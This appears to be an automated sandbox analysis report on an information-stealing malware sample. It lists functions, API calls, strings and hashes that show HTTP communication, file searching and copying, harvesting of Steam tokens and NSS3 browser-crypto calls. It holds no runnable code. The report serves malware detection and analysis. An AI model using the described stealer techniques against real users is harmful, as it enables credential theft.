Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20

Strings

ERROR, xrefs: 00412F12, 00412F4A

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR
API String ID: 3287882509-2861137601
Opcode ID: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
Instruction ID: b53bf029f71d461a7cd9a980bfe8ed76a20664019d00161f83185fc2695e4cb7
Opcode Fuzzy Hash: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
Instruction Fuzzy Hash: 3211303261010867CB24FF72E8529DD3768AE10708F40817EF805779D2EF386A0DCAD9

Function 004103E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Strings

Unknown, xrefs: 0041040A

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
Instruction ID: 19cb3bbfcee307e431a48a4cc2986d0f4610495d139a97f2bc99e78c6af915a2
Opcode Fuzzy Hash: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
Instruction Fuzzy Hash: B8E08033F04128534A207BA87C018DE776CDB44755710427FFD05D7241DB69995547D9

Function 004161A0 Relevance: 3.1, APIs: 2, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004161D7
lstrcatA.KERNEL32(?,00E59790), ref: 004161F2

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415EBC
Part of subcall function 00415EA0: FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F3B
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F67
Part of subcall function 00415EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,00E59F38,?,000003E8), ref: 00415FC3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00415FE3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00416009

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F86
Part of subcall function 00415EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
Part of subcall function 00415EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119

Part of subcall function 00415EA0: FindNextFileA.KERNEL32(?,?), ref: 00416160
Part of subcall function 00415EA0: FindClose.KERNEL32(?), ref: 00416172

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: ac9d7a5c53eef0348be8ee53cf8a267cf4080d1a91fd047cb8c12890735ffea5
Instruction ID: 98d42b3406129106ca52e3ce68672895595a1a21ef3683531b9833437f7f45f5
Opcode Fuzzy Hash: ac9d7a5c53eef0348be8ee53cf8a267cf4080d1a91fd047cb8c12890735ffea5
Instruction Fuzzy Hash: 4B41C375E002086BCB24FBB1DC43DFE377AABC4304F44451EF90562191EAB85B88CBA6

Function 00414400 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

lstrlenA.KERNEL32(00000000,00000000,?,00000000,004201E9,?,?,?,00416ED8,?,?), ref: 0041443F

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00414454

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 834c8e9a1660923ca4824822d867a6475a7f0fbc8207dcd100cbfa916f559b4c
Instruction ID: 081c47b6d937ec40d6c996030d6839391ee10078badbf5345814b8fee0ffd502
Opcode Fuzzy Hash: 834c8e9a1660923ca4824822d867a6475a7f0fbc8207dcd100cbfa916f559b4c
Instruction Fuzzy Hash: 9A11D6739141086ADB14FBB2DC539EE773CAE50348F50857EB506728D2EF38664CC6A9

Function 00410DA0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

Strings

&0A, xrefs: 00410DAE

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: &0A
API String ID: 3494564517-488416437
Opcode ID: 5e0d39f90cc3e526f1afed404e6c67091f8f40804da1df45c8e31fe95fd0f0a1
Instruction ID: 1b95d1e3e19af54c2c1672544d43783d0ab56fa141ae32e5822aae5f418e4f6d
Opcode Fuzzy Hash: 5e0d39f90cc3e526f1afed404e6c67091f8f40804da1df45c8e31fe95fd0f0a1
Instruction Fuzzy Hash: 53F0E5367006151B871209ADA840AA3F7AEEFD9E60714416BEA48EB395DAA5ECC043E4

Function 00407AB0 Relevance: 2.7, APIs: 2, Instructions: 214stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

lstrlenA.KERNEL32(00000000), ref: 00407C9D
lstrlenA.KERNEL32(00000000), ref: 00407CB1

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 79410e4df787b84ead98e4c408f0a717c03b23574040209dbabfa651d6aa55d0
Instruction ID: a859a10bf49f6e2adb18c49c1629115e66b52ddef5719b77f7765414daa87ac6
Opcode Fuzzy Hash: 79410e4df787b84ead98e4c408f0a717c03b23574040209dbabfa651d6aa55d0
Instruction Fuzzy Hash: E3711C72910108ABCB28FBA1DC56DEE7379AF54304B50853EF502765D1EF386A0DCB69

Function 004063D0 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,0040688E,00000000), ref: 0040642F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,0040688E,00000000), ref: 00406463

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
Instruction ID: 25d565d5ee4a4702b91c68662a662a7ad42dfcb8a2de35b795cdf97fb66203ee
Opcode Fuzzy Hash: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
Instruction Fuzzy Hash: 9321B4717407105BC334CBB9CC81BA7B7EAEBC0714F14453EEA5ADB3D0D679A8408648

Function 00406840 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
Instruction ID: 029a4059ce785aea66ee81bb854fb7a0a454fc3853df5ecaeac7f0707622af9f
Opcode Fuzzy Hash: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
Instruction Fuzzy Hash: ED417FB1A002099FDB24DF99D940AAFF7B9AF44314F11407AEC0AA7381E734DD50CB95

Function 00406780 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,004068D6,?,?,?,?,004068D6,?,?,?,?,00000000), ref: 004067F5

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
Instruction ID: 01cb8937eeb0f68714991e8ebc060aa972990f473894c37eb69bfcd2b7a4d248
Opcode Fuzzy Hash: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
Instruction Fuzzy Hash: 1E110C716041199BD724DF5CD8807A6F3E9FB08308F21493BE54BD7780D23DAC618799

Function 00410D50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9ff86aa52045c1a75e82c3a22932520cd9600684b4e6ca602800722b1fa87dd6
Instruction ID: bf07e7dc27ca486ce73a822693bad4f66ee15eaaa84330aa2caf21beff2e0ca4
Opcode Fuzzy Hash: 9ff86aa52045c1a75e82c3a22932520cd9600684b4e6ca602800722b1fa87dd6
Instruction Fuzzy Hash: C2F0A032A1015CABDB10DA58DC51B9DB3FCDB84701F1082A6BA08E32C0DA706F068B94

Function 00410D10 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
Instruction ID: fb15c47bbe0b93a4405a7b8ff06cc38f93f54865058fbad0eae59745ca59ce08
Opcode Fuzzy Hash: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
Instruction Fuzzy Hash: 92E0867260012817CB10BAE9E8015DA7758DF407B5B44453AF90DEA5D1DB38AEC587C8

Non-executed Functions

Function 6C6B0570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C6B05E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C6B061A
PK11_PubDeriveWithKDF.NSS3 ref: 6C6B0712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6B0740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6B0760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C6B07AE
PK11_FreeSymKey.NSS3(?), ref: 6C6B07BC
PK11_FreeSymKey.NSS3(?), ref: 6C6B07D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6B07DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B07EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C6B07F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C6B082F
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B08A9
SECITEM_DupItem_Util.NSS3(?), ref: 6C6B08D0

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
